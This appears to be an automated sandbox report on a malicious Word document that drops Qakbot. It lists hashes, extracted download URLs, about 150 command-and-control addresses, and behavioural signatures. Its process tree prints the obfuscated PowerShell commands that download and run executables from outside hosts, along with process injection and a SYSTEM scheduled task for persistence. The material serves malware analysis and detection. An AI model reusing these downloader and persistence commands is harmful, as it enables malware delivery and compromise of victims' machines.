Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
09-06-2020 11:55
Static task
static1
Behavioral task
behavioral1
Sample
AGRMT_06052020_195.doc
Resource
win7v200430
General
-
Target
AGRMT_06052020_195.doc
-
Size
220KB
-
MD5
bc8cf7a3c840dc88cfa89f69852e46e6
-
SHA1
1528a5750c9072ebbc963687079c010b18240c9e
-
SHA256
e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc
-
SHA512
c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317
Malware Config
Extracted
http://salwadm.com/tcphx/8888888.png
Extracted
http://flipkenya.com/nujazbwrhjy/8888888.png
Extracted
qakbot
spx135
1591627649
89.32.216.156:443
74.222.204.82:443
24.183.39.93:443
97.93.211.17:443
80.14.209.42:2222
96.35.170.82:2222
151.73.124.242:443
98.110.231.63:443
108.227.161.27:995
173.3.132.17:995
31.5.41.52:443
24.122.228.88:443
5.107.208.94:2222
76.185.136.58:443
50.29.166.232:995
73.210.114.187:443
92.114.107.193:995
24.43.22.220:993
50.247.230.33:995
72.142.106.198:465
102.41.122.185:995
67.131.59.17:443
184.98.104.7:995
69.11.247.242:443
201.127.4.70:443
72.204.242.138:50003
189.231.198.212:443
5.14.44.173:2222
5.14.76.156:443
151.205.102.42:443
179.51.23.31:443
72.190.101.70:443
73.76.47.127:443
80.240.26.178:443
72.36.59.46:2222
73.209.113.58:443
68.49.120.179:443
69.92.54.95:995
187.19.151.218:995
50.244.112.10:443
66.222.88.126:995
207.255.161.8:32102
108.58.9.238:995
105.98.154.57:443
98.219.77.197:443
216.163.4.91:443
47.152.210.233:443
178.223.17.74:995
72.204.242.138:20
82.127.193.151:2222
50.91.171.137:443
172.242.80.243:443
189.163.110.244:443
108.30.125.94:443
104.50.141.139:995
73.94.229.115:443
67.83.54.76:2222
72.29.181.77:2078
188.24.102.178:443
66.68.22.151:443
24.122.157.93:443
72.204.242.138:53
172.87.134.226:443
118.160.164.140:443
173.49.122.160:995
71.187.170.235:443
134.0.196.46:995
75.81.25.223:443
92.17.167.87:2222
185.246.9.69:995
70.123.92.175:2222
82.37.242.8:443
108.51.73.186:443
137.99.222.152:443
100.38.164.182:443
75.137.239.211:443
24.43.22.220:995
24.99.180.247:443
96.56.237.174:993
72.204.242.138:80
79.114.196.97:443
72.204.242.138:443
72.240.245.253:443
24.202.42.48:2222
46.102.60.186:443
200.113.201.83:993
98.27.176.35:443
47.201.1.210:443
50.78.93.74:443
68.60.221.169:465
66.26.160.37:443
190.198.124.212:2078
65.131.83.170:995
50.244.112.106:443
72.204.242.138:32102
77.159.149.74:443
184.96.155.4:993
72.16.212.108:465
47.153.115.154:995
72.240.200.181:2222
24.46.40.189:2222
68.82.125.234:443
188.173.70.18:443
47.40.244.237:443
5.13.105.2:443
76.30.66.244:443
5.14.188.235:443
72.204.242.138:995
5.69.56.255:443
5.14.248.119:443
188.192.75.8:443
24.27.82.216:2222
98.118.156.172:443
189.236.218.181:443
72.204.242.138:2078
47.41.3.40:443
108.28.90.129:443
184.89.71.68:443
31.50.210.205:2222
95.76.27.89:443
207.255.161.8:443
149.71.50.158:443
98.222.23.221:443
96.56.237.174:32103
68.116.193.239:443
100.38.123.22:443
47.24.47.218:443
24.110.96.149:443
181.91.254.1:443
96.18.240.158:443
67.165.206.193:995
69.28.222.54:443
98.243.187.85:443
184.180.157.203:2222
47.136.224.60:443
73.90.4.146:443
207.255.161.8:2222
203.33.139.134:443
104.221.4.11:2222
72.228.3.116:443
72.209.191.27:443
97.127.136.28:0
108.45.29.12:443
2.89.100.34:443
64.19.74.29:995
208.82.44.203:443
199.247.16.80:443
199.247.22.145:443
89.43.108.19:443
71.182.142.63:443
Signatures
-
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 15 3388 powershell.exe 18 764 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exefile2.exefile2.exenniglk.exenniglk.exeexplorer.exepid process 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 764 powershell.exe 764 powershell.exe 764 powershell.exe 3420 file2.exe 3420 file2.exe 3416 file2.exe 3416 file2.exe 3416 file2.exe 3416 file2.exe 1992 nniglk.exe 1992 nniglk.exe 1612 nniglk.exe 1612 nniglk.exe 1612 nniglk.exe 1612 nniglk.exe 1912 explorer.exe 1912 explorer.exe 1912 explorer.exe 1912 explorer.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 764 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 1164 WINWORD.EXE 1164 WINWORD.EXE -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
nniglk.exepid process 1992 nniglk.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
nniglk.exefile2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 nniglk.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc nniglk.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service nniglk.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc file2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service file2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service nniglk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 file2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 nniglk.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc nniglk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 file2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc file2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service file2.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1164 WINWORD.EXE 1164 WINWORD.EXE -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
WINWORD.EXEfile2.exenniglk.exedescription pid process target process PID 1164 wrote to memory of 3992 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3992 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3332 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3332 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3416 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3416 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 2352 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 2352 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 1532 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 1532 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3972 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3972 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3532 1164 WINWORD.EXE cmd.exe PID 1164 wrote to memory of 3532 1164 WINWORD.EXE cmd.exe PID 3420 wrote to memory of 3416 3420 file2.exe file2.exe PID 3420 wrote to memory of 3416 3420 file2.exe file2.exe PID 3420 wrote to memory of 3416 3420 file2.exe file2.exe PID 3420 wrote to memory of 1992 3420 file2.exe nniglk.exe PID 3420 wrote to memory of 1992 3420 file2.exe nniglk.exe PID 3420 wrote to memory of 1992 3420 file2.exe nniglk.exe PID 3420 wrote to memory of 3928 3420 file2.exe schtasks.exe PID 3420 wrote to memory of 3928 3420 file2.exe schtasks.exe PID 3420 wrote to memory of 3928 3420 file2.exe schtasks.exe PID 1992 wrote to memory of 1612 1992 nniglk.exe nniglk.exe PID 1992 wrote to memory of 1612 1992 nniglk.exe nniglk.exe PID 1992 wrote to memory of 1612 1992 nniglk.exe nniglk.exe PID 1992 wrote to memory of 1912 1992 nniglk.exe explorer.exe PID 1992 wrote to memory of 1912 1992 nniglk.exe explorer.exe PID 1992 wrote to memory of 1912 1992 nniglk.exe explorer.exe PID 1992 wrote to memory of 1912 1992 nniglk.exe explorer.exe -
Executes dropped EXE 4 IoCs
Processes:
file2.exefile2.exenniglk.exenniglk.exepid process 3420 file2.exe 3416 file2.exe 1992 nniglk.exe 1612 nniglk.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEpid process 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE -
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3992 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3332 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3416 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2352 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1532 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3972 1164 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3532 1164 cmd.exe WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 653⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt2⤵
- Process spawned unexpected child process
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 653⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\tmpdir\tmps2.bat2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 23⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 24⤵
-
C:\Users\Public\tmpdir\file2.exeC:\Users\Public\tmpdir\file2.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Public\tmpdir\file2.exeC:\Users\Public\tmpdir\file2.exe /C4⤵
- Suspicious behavior: EnumeratesProcesses
- Checks SCSI registry key(s)
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exeC:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exeC:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe /C5⤵
- Suspicious behavior: EnumeratesProcesses
- Checks SCSI registry key(s)
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn txtmhfdmqz /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I txtmhfdmqz" /SC ONCE /Z /ST 14:09 /ET 14:214⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.dat
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
-
C:\Users\Public\1.txt
-
C:\Users\Public\tmp.bat
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\tmps2.bat
-
memory/1612-19-0x00000000027E0000-0x00000000027E1000-memory.dmpFilesize
4KB
-
memory/1992-20-0x00000000022D0000-0x000000000230A000-memory.dmpFilesize
232KB
-
memory/3416-15-0x0000000002700000-0x0000000002701000-memory.dmpFilesize
4KB